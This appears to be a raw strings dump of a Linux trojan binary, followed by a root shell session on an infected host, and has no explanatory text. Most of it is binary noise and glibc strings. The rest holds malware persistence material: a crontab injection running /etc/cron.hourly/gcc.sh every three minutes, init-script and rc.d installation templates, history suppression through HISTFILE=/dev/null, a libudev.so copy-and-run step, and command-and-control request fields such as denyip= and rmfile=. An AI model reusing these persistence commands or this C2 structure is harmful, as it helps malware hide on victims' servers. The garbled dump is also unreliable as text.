95\J | |
SH9r | |
[^_] | |
ZhxX | |
[^_] | |
95\J | |
SH9r | |
[^_] | |
C +C | |
[^_] | |
@t;= | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
9r0t | |
@[^_] | |
+5TO | |
$[^_] | |
[^_] | |
[^_] | |
[^_] | |
ti E | |
,[^_] | |
>AELDt | |
;5\O | |
`[^_] | |
`[^_] | |
[^_] | |
w 9u | |
[^_] | |
[^_] | |
<8#} | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
AELD | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
GuP1 | |
t(8( | |
8(t} | |
@+D$ | |
[^_] | |
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQj | |
t0@Nt | |
t(@Nt | |
Gu~1 | |
GuL1 | |
[^_] | |
u7;S | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
/POS | |
IX_Vf | |
[^_] | |
VUUU | |
@[^_] | |
@[^_] | |
[^_] | |
Genu | |
Auth | |
cAMD | |
enti | |
ntel | |
ineI | |
}~=` | |
POSI | |
X_V6 | |
_ILP | |
32_O | |
FF32 | |
POSI | |
X_V6 | |
_ILP | |
32_O | |
FFBI | |
POSI | |
X_V6 | |
_LP6 | |
4_OFf | |
POSI | |
X_V6 | |
_LPB | |
IG_O | |
FFBI | |
3C,1 | |
3C81 | |
u-WVS | |
[^_= | |
PWVS | |
[^_] | |
[^_] | |
out | |
gfff | |
of m | |
emor | |
USVW | |
_^[]= | |
USVW | |
_^[]= | |
_^[] | |
[^_] | |
[^_] | |
[^_] | |
,[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_= | |
Su'e | |
4[^_] | |
4[^_] | |
[^_] | |
[^_] | |
[^_] | |
$[^_] | |
[^_] | |
[^_] | |
[^_] | |
<.u? | |
tdte | |
tdtP | |
[^_] | |
[^_] | |
[^_] | |
uI9E | |
[^_] | |
[^_] | |
ty9u | |
[^_] | |
[^_] | |
[^_] | |
ti|o | |
[^_] | |
[^_] | |
[^_] | |
/usr | |
/lib | |
/gcof | |
/usr | |
/lib | |
/gcof | |
gcon | |
v-mo | |
dulef | |
[^_] | |
`[^_] | |
`[^_] | |
`[^_] | |
`[^_] | |
d[^_] | |
d[^_] | |
D[^_] | |
D[^_] | |
D[^_] | |
[^_] | |
P[^_] | |
[^_] | |
`[^_] | |
`[^_] | |
`[^_] | |
`[^_] | |
P[^_] | |
P[^_] | |
P[^_] | |
P[^_] | |
P[^_] | |
P[^_] | |
H[^_] | |
H[^_] | |
H[^_] | |
[^_] | |
t#;u | |
t[^_] | |
[^_] | |
<[^_] | |
[^_] | |
WVS1 | |
tm9] | |
[^_] | |
tW9] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
*<_t/<-t+<.t'<, | |
t <:t | |
+<_t0<-t,<.t(<,t$<:t </ | |
C t= | |
9S w | |
[^_] | |
9S w | |
[^_] | |
[^_] | |
C t> | |
9K w | |
[^_] | |
9K w | |
[^_] | |
/SYS | |
[^_] | |
[^_] | |
kA$l | |
[^_] | |
[^_] | |
[^_] | |
B <8 | |
/loc | |
ale. | |
aliaf | |
[^_] | |
[^_] | |
t]<: | |
[^_] | |
[^_] | |
[^_] | |
;@t0 | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
tT< tF< tB | |
0< w | |
H tHe | |
0< v | |
([^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
f;;u | |
@[^_] | |
@[^_] | |
0< v | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
u!;C | |
[^_] | |
< wje | |
[^_] | |
PH9Z | |
<Zw | |
[^_] | |
[^_] | |
<Zw | |
9N,w | |
<Zw | |
<Zw | |
<Zw | |
<Zw | |
<Zw | |
<}w/1 | |
[^_] | |
F0[^_] | |
[^_] | |
< wje | |
[^_] | |
<}w^ | |
[^_] | |
\$+) | |
D$+) | |
[^_] | |
<}wJ | |
gfff | |
[^_] | |
<)w | |
L<.w | |
[^_] | |
t'<%t# | |
[^_] | |
x[^] | |
@,+B$ | |
C +C | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
BX+H | |
([^_] | |
[^_] | |
~T9u | |
[^_] | |
P$;P( | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
([^_] | |
Gu[1 | |
Gu#1 | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
\[^) | |
[^_] | |
[^_] | |
[^_] | |
gfff | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
C$+E | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
t!</ | |
0[^_] | |
0[^_] | |
[^_] | |
[^_] | |
gfff | |
W t4 | |
gfff | |
$[^_] | |
[^_] | |
[^_] | |
$[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
-uQ;u | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
@bQs | |
[^_] | |
<Ou) | |
<Pu) | |
<Lu) | |
$[^_] | |
<}t(1 | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
< wq | |
[^_] | |
< vA8 | |
[^_] | |
< w2 | |
[^_] | |
[^_] | |
< vG8 | |
< w2 | |
< v\8 | |
< ww | |
< w2 | |
< vW | |
< ww | |
< w2 | |
< vN | |
< w4 | |
< w4 | |
\[^_] | |
[^_] | |
[^_] | |
,[^_] | |
,[^_] | |
[^_] | |
@bQs | |
<%td< | |
[^_] | |
<lt|<Ztx<ut~ | |
[^_] | |
[^_] | |
[^_] | |
UPQR | |
y ZZY | |
$`D | |
[^_] | |
[^_] | |
C$tF | |
[^_] | |
[^_] | |
[^_] | |
A$;8s | |
[^_] | |
TRAN | |
SLIT | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
h[^_] | |
h[^_] | |
h[^_] | |
Jt.P | |
X[^_ | |
Bt(P | |
X[^_ | |
[^_] | |
[^_] | |
WVUS | |
[]^_ | |
[^_] | |
[^_] | |
L[^_] | |
L[^_] | |
H[^_] | |
H[^_] | |
[^_] | |
[^_] | |
R Iu | |
WVUS | |
[]^_ | |
[^_] | |
[^_] | |
<*t <'t | |
$[^_] | |
$[^_] | |
[^_] | |
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQj | |
[^_] | |
u1;M | |
[^_] | |
[^_] | |
4[^_] | |
4[^_] | |
[^_] | |
[^_] | |
$[^_] | |
gmon | |
seco | |
.pro | |
file | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
H[^_] | |
[^_] | |
[^_] | |
[^_] | |
t=;E | |
[^_] | |
[^_] | |
X[^_] | |
X[^_] | |
0< v& | |
t(:C | |
[^_] | |
[^_] | |
< vD | |
[^_] | |
0tB1 | |
< vY | |
< v/ | |
[^_] | |
<3pu | |
0< v | |
VUUU+ | |
t,<0 | |
t(:C | |
[^_] | |
[^_] | |
$[^_] | |
$[^_] | |
$[^_] | |
$[^_] | |
< vD | |
[^_] | |
0tU1 | |
< v` | |
< v/ | |
[^_] | |
0< v | |
VUUU+ | |
t(:C | |
[^_] | |
[^_] | |
$[^_] | |
$[^_] | |
$[^_] | |
$[^_] | |
< vD | |
[^_] | |
0tU1 | |
< v` | |
< v/ | |
[^_] | |
0< v | |
VUUU+ | |
R Iu | |
WVUS | |
[]^_ | |
[^_] | |
[^_] | |
@[^_] | |
[^_] | |
[^_] | |
L[^_] | |
t"9@ | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
t%~ | |
[^_] | |
t4<L | |
[^_] | |
<[^_] | |
<[^_] | |
[^_] | |
D9[u | |
Ac@t | |
Ac@t | |
[^_] | |
Bc@t | |
[^_] | |
Bc@u | |
,[^_] | |
,[^_] | |
Ac@t | |
WL;Q | |
[^_] | |
WVSRP | |
^_] | |
^_] | |
t#~ | |
t#~ | |
x zt | |
[^_] | |
[^_] | |
0^_] | |
0^_] | |
[^_] | |
[^_] | |
t19~ | |
98t7 | |
<[^_] | |
[^_] | |
[^_] | |
r ;J | |
[^_] | |
t%~ | |
L[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
[^_] | |
9F<v$ | |
[^_] | |
[^_] | |
,[^_] | |
[^_] | |
HOME=/ | |
HISTFILE=/dev/null | |
MYSQL_HISTFILE=/dev/null | |
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin | |
/proc/self/exe | |
/proc/%d/exe | |
#!/bin/sh | |
# chkconfig: 12345 90 90 | |
# description: %s | |
### BEGIN INIT INFO | |
# Provides: %s | |
# Required-Start: | |
# Required-Stop: | |
# Default-Start: 1 2 3 4 5 | |
# Default-Stop: | |
# Short-Description: %s | |
### END INIT INFO | |
case $1 in | |
start) | |
stop) | |
esac | |
/etc/init.d/%s | |
/etc/cron.hourly/gcc.sh | |
/etc/rc%d.d/S90%s | |
/etc/rc.d/rc%d.d/S90%s | |
--add | |
chkconfig | |
defaults | |
update-rc.d | |
sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab | |
m7A4nQ_/nA | |
%s%s | |
insmod | |
--del | |
remove | |
/proc/rs_dev | |
Accept: */* | |
Accept-Language: zh-cn | |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) | |
Connection: Keep-Alive | |
http:// | |
POST %s HTTP/1.1 | |
%sHost: %s | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: %d | |
%s%s | |
GET %s HTTP/1.1 | |
%sHost: %s | |
/proc/net/tcp | |
socket:[ | |
/proc | |
/proc/%d/exe | |
/proc/%d/fd | |
/proc/%s/fd/%s | |
info= | |
%u:%s| | |
%d--%s_%d:%s| | |
%s/%s | |
md5= | |
denyip= | |
filename= | |
rmfile= | |
m4S4nAC/n&ZV | |
A/TB | |
m.[$n__#4%\C | |
m.[$n3 | |
/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin | |
PATH | |
m7A4nQ_/nA | |
m [(n3 | |
m6_6n3 | |
m4S4nAC/n&ZV | |
A/TB | |
m.[$n__#4%\C | |
m.[$n3 | |
*6F6{ | |
SV!Q6#Frt | |
4Q0BFrt | |
NF@36AIA95 | |
N54z40BB2FA36AAA9541F0BB2FA36AAA9541F0B | |
NF@36AIA95 | |
N54z40BB2FA36AAA9541F0BB2FA36AAA9541F0 | |
NFA36AYA95q1"0+BFF | |
3WA#A\5X1h0 | |
BSF33QA(AW5G1h0 | |
B]F53BA.AT5@1F0CB2FA36AVA95q1"0+BFF | |
3WA#A\5X1h0 | |
BSF33QA(AW5G1h0 | |
B[F&3^A5A9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0m4S4nAC/nA | |
/proc/%d/exe | |
%s%s | |
/proc/meminfo | |
/proc/cpuinfo | |
%d*%d | |
127.0.0.1 | |
55Eh&TQ 5 M | |
hS-/ | |
=66N | |
LI>Q6#Frt | |
NF@36AIA95 | |
N54z40BB2FA36AAA9541F0BB2FA36AAA9541F0B | |
NF@36AIA95 | |
N54z40BB2FA36AAA9541F0BB2FA36AAA9541F0 | |
NFA36AYA95q1"0+BFF | |
3WA#A\5X1h0 | |
BSF33QA(AW5G1h0 | |
B]F53BA.AT5@1F0CB2FA36AVA95q1"0+BFF | |
3WA#A\5X1h0 | |
BSF33QA(AW5G1h0 | |
B[F&3^A5A9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0BB2FA36AAA9541F0m4S4nAC/n&ZV | |
A/TB | |
STATIC | |
2.0.1 | |
FATAL: exception not rethrown | |
/proc/sys/kernel/version | |
/proc/sys/kernel/osrelease | |
FATAL: kernel too old | |
FATAL: cannot determine kernel version | |
/dev/full | |
/dev/null | |
set_thread_area failed when setting up thread-local storage | |
UUUU | |
?3333 | |
^B{ I | |
UUUUUUUU | |
?33333333 | |
UUUUUUU | |
P^Cy | |
^B{ $I | |
/bin/sh | |
exit 0 | |
LIBC_FATAL_STDERR_ | |
/dev/tty | |
======= Backtrace: ========= | |
======= Memory map: ======== | |
/proc/self/maps | |
,ccs= | |
corrupted double-linked list | |
<unknown> | |
malloc: top chunk is corrupt | |
malloc: using debugging hooks | |
TOP_PAD_ | |
PERTURB_ | |
MMAP_MAX_ | |
ARENA_MAX | |
ARENA_TEST | |
PER_THREAD | |
TRIM_THRESHOLD_ | |
MMAP_THRESHOLD_ | |
Arena %d: | |
system bytes = %10u | |
in use bytes = %10u | |
Total (incl. mmap): | |
max mmap regions = %10u | |
max mmap bytes = %10lu | |
free(): invalid pointer | |
free(): invalid size | |
malloc(): memory corruption | |
realloc(): invalid pointer | |
realloc(): invalid next size | |
realloc(): invalid old size | |
*** glibc detected *** %s: %s: 0x%s *** | |
double free or corruption (!prev) | |
free(): invalid next size (normal) | |
free(): invalid next size (fast) | |
double free or corruption (fasttop) | |
double free or corruption (top) | |
double free or corruption (out) | |
free(): corrupted unsorted chunks | |
munmap_chunk(): invalid pointer | |
malloc(): memory corruption (fast) | |
malloc(): smallbin double linked list corrupted | |
malloc(): corrupted unsorted chunks | |
malloc(): corrupted unsorted chunks 2 | |
ANSI_X3.4-1968//TRANSLIT | |
GETCONF_DIR | |
/usr/libexec/getconf | |
/proc/sys/kernel/ngroups_max | |
LP64_OFF64 | |
LPBIG_OFFBIG | |
/proc/sys/kernel/rtsig-max | |
-m32 | |
-m64 | |
-D_LARGEFILE64_SOURCE | |
glibc 2.5 | |
NPTL 2.5 | |
/bin:/usr/bin | |
-m32 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 | |
-D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 | |
/dev/log | |
<%d> | |
%h %e %T | |
[%d] | |
/dev/console | |
syslog: unknown facility/priority: %x | |
/proc/meminfo | |
MemFree: %ld kB | |
MemTotal: %ld kB | |
/proc/stat | |
/proc/cpuinfo | |
processor | |
%d.%d.%d.%d | |
dlopen | |
cannot create TLS data structures | |
/var/tmp | |
/var/profile | |
apic | |
mtrr | |
cmov | |
pse36 | |
clflush | |
acpi | |
fxsr | |
sse2 | |
ia64 | |
i386 | |
i486 | |
i586 | |
i686 | |
GCONV_PATH | |
GETCONF_DIR | |
HOSTALIASES | |
LD_AUDIT | |
LD_DEBUG | |
LD_DEBUG_OUTPUT | |
LD_DYNAMIC_WEAK | |
LD_LIBRARY_PATH | |
LD_ORIGIN_PATH | |
LD_PRELOAD | |
LD_PROFILE | |
LD_SHOW_AUXV | |
LD_USE_LOAD_BIAS | |
LOCALDOMAIN | |
LOCPATH | |
MALLOC_TRACE | |
NIS_PATH | |
NLSPATH | |
RESOLV_HOST_CONF | |
RES_OPTIONS | |
TMPDIR | |
TZDIR | |
LD_AOUT_LIBRARY_PATH | |
LD_AOUT_PRELOAD | |
LD_WARN | |
LD_LIBRARY_PATH | |
LD_BIND_NOW | |
LD_BIND_NOT | |
LD_DYNAMIC_WEAK | |
LD_PROFILE_OUTPUT | |
/etc/suid-debug | |
MALLOC_CHECK_ | |
LD_ASSUME_KERNEL | |
alias | |
module | |
ISO-10646/UCS4/ | |
=INTERNAL->ucs4 | |
=ucs4->INTERNAL | |
UCS-4LE// | |
=INTERNAL->ucs4le | |
=ucs4le->INTERNAL | |
ISO-10646/UTF8/ | |
=INTERNAL->utf8 | |
=utf8->INTERNAL | |
ISO-10646/UCS2/ | |
=ucs2->INTERNAL | |
=INTERNAL->ucs2 | |
ANSI_X3.4-1968// | |
=ascii->INTERNAL | |
=INTERNAL->ascii | |
UNICODEBIG// | |
=ucs2reverse->INTERNAL | |
=INTERNAL->ucs2reverse | |
UCS4// | |
ISO-10646/UCS4/ | |
UCS-4// | |
ISO-10646/UCS4/ | |
UCS-4BE// | |
ISO-10646/UCS4/ | |
CSUCS4// | |
ISO-10646/UCS4/ | |
ISO-10646// | |
ISO-10646/UCS4/ | |
10646-1:1993// | |
ISO-10646/UCS4/ | |
10646-1:1993/UCS4/ | |
ISO-10646/UCS4/ | |
OSF00010104// | |
ISO-10646/UCS4/ | |
OSF00010105// | |
ISO-10646/UCS4/ | |
OSF00010106// | |
ISO-10646/UCS4/ | |
WCHAR_T// | |
INTERNAL | |
UTF8// | |
ISO-10646/UTF8/ | |
UTF-8// | |
ISO-10646/UTF8/ | |
ISO-IR-193// | |
ISO-10646/UTF8/ | |
OSF05010001// | |
ISO-10646/UTF8/ | |
ISO-10646/UTF-8/ | |
ISO-10646/UTF8/ | |
UCS2// | |
ISO-10646/UCS2/ | |
UCS-2// | |
ISO-10646/UCS2/ | |
OSF00010100// | |
ISO-10646/UCS2/ | |
OSF00010101// | |
ISO-10646/UCS2/ | |
OSF00010102// | |
ISO-10646/UCS2/ | |
ANSI_X3.4// | |
ANSI_X3.4-1968// | |
ISO-IR-6// | |
ANSI_X3.4-1968// | |
ANSI_X3.4-1986// | |
ANSI_X3.4-1968// | |
ISO_646.IRV:1991// | |
ANSI_X3.4-1968// | |
ASCII// | |
ANSI_X3.4-1968// | |
ISO646-US// | |
ANSI_X3.4-1968// | |
US-ASCII// | |
ANSI_X3.4-1968// | |
US// | |
ANSI_X3.4-1968// | |
IBM367// | |
ANSI_X3.4-1968// | |
CP367// | |
ANSI_X3.4-1968// | |
CSASCII// | |
ANSI_X3.4-1968// | |
OSF00010020// | |
ANSI_X3.4-1968// | |
UNICODELITTLE// | |
ISO-10646/UCS2/ | |
UCS-2LE// | |
ISO-10646/UCS2/ | |
UCS-2BE// | |
UNICODEBIG// | |
GCONV_PATH | |
/usr/lib/gconv/gconv-modules.cache | |
gconv | |
gconv_init | |
gconv_end | |
LOCPATH | |
LC_COLLATE | |
LC_CTYPE | |
LC_MONETARY | |
LC_NUMERIC | |
LC_TIME | |
LC_MESSAGES | |
LC_PAPER | |
LC_NAME | |
LC_ADDRESS | |
LC_TELEPHONE | |
LC_MEASUREMENT | |
LC_IDENTIFICATION | |
?HP[hw | |
LC_ALL | |
LANG | |
/usr/lib/locale | |
/usr/lib/locale/locale-archive | |
upper | |
lower | |
alpha | |
digit | |
xdigit | |
space | |
graph | |
blank | |
cntrl | |
punct | |
alnum | |
toupper | |
tolower | |
POSIX | |
ANSI_X3.4-1968 | |
/usr/share/locale | |
plural= | |
nplurals= | |
{fG5 | |
0123456789abcdefghijklmnopqrstuvwxyz | |
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZto_outpunct | |
(nil) | |
(null) | |
*** %n in writable segment detected *** | |
*** invalid %N$ use detected *** | |
0000000000000000 | |
Unknown error | |
/etc/localtime | |
Universal | |
%[^0-9,+-] | |
%hu:%hu:%hu | |
M%hu.%hu.%hu%n | |
TZDIR | |
TZif | |
posixrules | |
/usr/share/zoneinfo | |
%H:%M | |
%H:%M:%S | |
%m/%d/%y | |
%Y-%m-%d | |
%I:%M:%S %p | |
ndots: | |
timeout: | |
attempts: | |
inet6 | |
ip6-bytestring | |
no-ip6-dotint | |
rotate | |
no-check-names | |
LOCALDOMAIN | |
/etc/resolv.conf | |
domain | |
search | |
nameserver | |
sortlist | |
options | |
RES_OPTIONS | |
cannot create cache for search path | |
ELF file data encoding not little-endian | |
ELF file version ident does not match current one | |
ELF file version does not match current one | |
only ET_DYN and ET_EXEC can be loaded | |
ELF file's phentsize not the expected size | |
file=%s [%lu]; generating link map | |
cannot create shared object descriptor | |
ELF load command address/offset not properly aligned | |
object file has no loadable segments | |
cannot dynamically load executable | |
cannot change memory protections | |
ELF load command alignment not page-aligned | |
cannot allocate TLS data structures for initial thread | |
failed to map segment from shared object | |
object file has no dynamic section | |
shared object cannot be dlopen()ed | |
cannot allocate memory for program header | |
cannot enable executable stack as shared object requires | |
dynamic: 0x%0*lx base: 0x%0*lx size: 0x%0*Zx | |
entry: 0x%0*lx phdr: 0x%0*lx phnum: %*u | |
cannot create search path array | |
cannot create RUNPATH/RPATH copy | |
file=%s [%lu]; needed by %s [%lu] | |
find library=%s [%lu]; searching | |
cannot open shared object file | |
cannot allocate name record | |
search path= | |
(%s from file %s) | |
(%s) | |
file too short | |
cannot read file data | |
invalid ELF header | |
ELF file OS ABI invalid | |
ELF file ABI version invalid | |
internal error | |
trying file=%s | |
cannot stat shared object | |
cannot map zero-fill pages | |
cannot close file descriptor | |
system search path | |
ORIGIN | |
PLATFORM | |
RPATH | |
RUNPATH | |
wrong ELF class: ELFCLASS64 | |
/lib/ | |
/usr/lib/ | |
/etc/ld.so.cache | |
search cache=%s | |
ld.so-1.7.0 | |
glibc-ld.so.cache1.1 | |
symbol=%s; lookup in file=%s [%lu] | |
file=%s [%lu]; needed by %s [%lu] (relocation dependency) | |
binding file %s [%lu] to %s [%lu]: %s symbol `%s' | |
(no version symbols) | |
symbol | |
, version | |
not defined in file | |
with link time reference | |
<main program> | |
relocation error | |
symbol lookup error | |
protected | |
normal | |
[%s] | |
undefined symbol: | |
cannot allocate memory in static TLS block | |
cannot make segment writable for relocation | |
%s: Symbol `%s' has different size in shared object, consider re-linking | |
%s: no PLTREL found in object %s | |
%s: out of memory to store relocation results for %s | |
cannot restore segment prot after reloc | |
(lazy) | |
relocation processing: %s%s | |
<program name unknown> | |
unexpected reloc type 0x | |
unexpected PLT reloc type 0x | |
cannot apply additional memory protection after relocation | |
DYNAMIC LINKER BUG!!! | |
%s: %s: %s%s%s%s%s | |
continued | |
fatal | |
%s: error: %s: %s (%s) | |
out of memory | |
error while loading shared libraries | |
/proc/self/exe | |
GLIBC_PRIVATE | |
_dl_open_hook | |
gconv_trans_context | |
gconv_trans | |
gconv_trans_init | |
gconv_trans_end | |
^[yY] | |
^[nN] | |
Sunday | |
Monday | |
Tuesday | |
Wednesday | |
Thursday | |
Friday | |
Saturday | |
January | |
February | |
March | |
April | |
June | |
July | |
August | |
September | |
October | |
November | |
December | |
%a %b %e %H:%M:%S %Y | |
%a %b %e %H:%M:%S %Z %Y | |
%p%t%g%t%m%t%f | |
%a%N%f%N%d%N%b%N%s %h %e %r%N%C-%z %T%N%c%N | |
+%c %a %l | |
ISO/IEC 14652 i18n FDCC-set | |
Keld Simonsen | |
keld@dkuug.dk | |
+45 3122-6543 | |
+45 3325-6543 | |
1997-12-20 | |
ISO/IEC JTC1/SC22/WG20 - internationalization | |
C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
i18n:1999 | |
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ | |
libc | |
OUTPUT_CHARSET | |
charset= | |
LANGUAGE | |
messages | |
[Am- | |
kpnJ | |
uD;s | |
)r+[ | |
[!|n | |
uYD?e | |
I9C- | |
I!G. | |
U^h6LU3 | |
U.y` | |
3?Cy | |
'_Djz | |
$po?b | |
w};u | |
=t%j | |
MP0! | |
t0tv | |
=u8Q)+ | |
*~xx | |
~j2= | |
|;#o | |
Ac+; | |
^2XX% | |
!{>;b | |
dI@B | |
2I%% | |
to_inpunct | |
Success | |
Operation not permitted | |
No such file or directory | |
No such process | |
Interrupted system call | |
Input/output error | |
No such device or address | |
Argument list too long | |
Exec format error | |
Bad file descriptor | |
No child processes | |
Cannot allocate memory | |
Permission denied | |
Bad address | |
Block device required | |
Device or resource busy | |
File exists | |
Invalid cross-device link | |
No such device | |
Not a directory | |
Is a directory | |
Invalid argument | |
Too many open files in system | |
Too many open files | |
Text file busy | |
File too large | |
No space left on device | |
Illegal seek | |
Read-only file system | |
Too many links | |
Broken pipe | |
Numerical result out of range | |
Resource deadlock avoided | |
File name too long | |
No locks available | |
Function not implemented | |
Directory not empty | |
No message of desired type | |
Identifier removed | |
Channel number out of range | |
Level 2 not synchronized | |
Level 3 halted | |
Level 3 reset | |
Link number out of range | |
Protocol driver not attached | |
No CSI structure available | |
Level 2 halted | |
Invalid exchange | |
Invalid request descriptor | |
Exchange full | |
No anode | |
Invalid request code | |
Invalid slot | |
Bad font file format | |
Device not a stream | |
No data available | |
Timer expired | |
Out of streams resources | |
Machine is not on the network | |
Package not installed | |
Object is remote | |
Link has been severed | |
Advertise error | |
Srmount error | |
Communication error on send | |
Protocol error | |
Multihop attempted | |
RFS specific error | |
Bad message | |
Name not unique on network | |
File descriptor in bad state | |
Remote address changed | |
Streams pipe error | |
Too many users | |
Destination address required | |
Message too long | |
Protocol not available | |
Protocol not supported | |
Socket type not supported | |
Operation not supported | |
Protocol family not supported | |
Address already in use | |
Network is down | |
Network is unreachable | |
Connection reset by peer | |
No buffer space available | |
Connection timed out | |
Connection refused | |
Host is down | |
No route to host | |
Operation already in progress | |
Operation now in progress | |
Stale NFS file handle | |
Structure needs cleaning | |
Not a XENIX named type file | |
No XENIX semaphores available | |
Is a named type file | |
Remote I/O error | |
Disk quota exceeded | |
No medium found | |
Wrong medium type | |
Operation canceled | |
Required key not available | |
Key has expired | |
Key has been revoked | |
Key was rejected by service | |
Owner died | |
State not recoverable | |
Resource temporarily unavailable | |
Inappropriate ioctl for device | |
Numerical argument out of domain | |
Too many levels of symbolic links | |
Value too large for defined data type | |
Can not access a needed shared library | |
Accessing a corrupted shared library | |
.lib section in a.out corrupted | |
Attempting to link in too many shared libraries | |
Cannot exec a shared library directly | |
Invalid or incomplete multibyte or wide character | |
Interrupted system call should be restarted | |
Socket operation on non-socket | |
Protocol wrong type for socket | |
Address family not supported by protocol | |
Cannot assign requested address | |
Network dropped connection on reset | |
Software caused connection abort | |
Transport endpoint is already connected | |
Transport endpoint is not connected | |
Cannot send after transport endpoint shutdown | |
Too many references: cannot splice | |
_dlfcn_hook | |
%s%s%s | |
%s%s%s: %s | |
unsupported dlinfo request | |
invalid namespace | |
Unknown error | |
0123456789abcdef | |
%s: cannot open file: %s | |
%s: cannot create file: %s | |
%s: cannot map file: %s | |
%s: cannot stat file: %s | |
%s: file is no correct profile data file for `%s' | |
Out of memory while initializing profiler | |
invalid mode for dlopen() | |
cannot extend global scope | |
cannot create scope list | |
no more namespaces available for dlmopen() | |
invalid target namespace in dlmopen() | |
empty dynamic string token substitution | |
opening file=%s [%lu]; direct_opencount=%u | |
TLS generation counter wrapped! Please report this. | |
closing file=%s; direct_opencount=%u | |
file=%s [%lu]; destroying link map | |
TLS generation counter wrapped! Please report as described in <http://www.gnu.org/software/libc/bugs.html>. | |
calling fini: %s [%lu] | |
dlclose | |
shared object not open | |
IGNORE | |
inity | |
;invalid mode parameter | |
DST not allowed in SUID/SGID programs | |
cannot load auxiliary `%s' because of empty dynamic string token substitution | |
empty dynamics string token substitution | |
load auxiliary object=%s requested by file=%s | |
load filtered object=%s requested by file=%s | |
cannot allocate dependency list | |
cannot allocate symbol search list | |
Filters not supported with LD_TRACE_PRELINKING | |
calling init: %s | |
calling preinit: %s | |
checking for version `%s' in file %s [%lu] required by file %s [%lu] | |
no version information available (required by | |
cannot allocate version reference table | |
unsupported version | |
of Verdef record | |
weak version ` | |
' not found (required by | |
of Verneed record | |
RTLD_NEXT used in code not dynamically loaded | |
*** stack smashing detected ***: %s terminated | |
!#Ff3VE.-7 | |
V[_ 0 | |
#A.A | |
k$U6 | |
k-R6 | |
6-BF | |
,'F55RBal W5 | |
,'F55RBal WA[AF | |
%0W6a | |
1.W#1 | |
i$GUA | |
'!Z)a | |
P(/% | |
+$Q)/U_&a$M] | |
+$Q)/U_&A | |
0-G2$ | |
%,]+$ | |
B$3,P[U]F | |
5*]F | |
5*]',Z6 | |
25VF | |
72F/,V6 | |
#!/bin/sh | |
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin | |
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done | |
cp /lib/libudev.so /lib/libudev.so.6 | |
/lib/libudev.so.6 | |
BB2FA36AAA9541F0 | |
8.8.8.8 | |
8.8.4.4 | |
CAk[S | |
[root@acme ~]# cat /etc/cron.hourly/gcc.sh | |
#!/bin/sh | |
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin | |
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done | |
cp /lib/libudev.so /lib/libudev.so.6 | |
/lib/libudev.so.6 | |
[root@acme ~]# | |
[root@acme ~]# ls -alh /etc/init.d/gctjxueidd | |
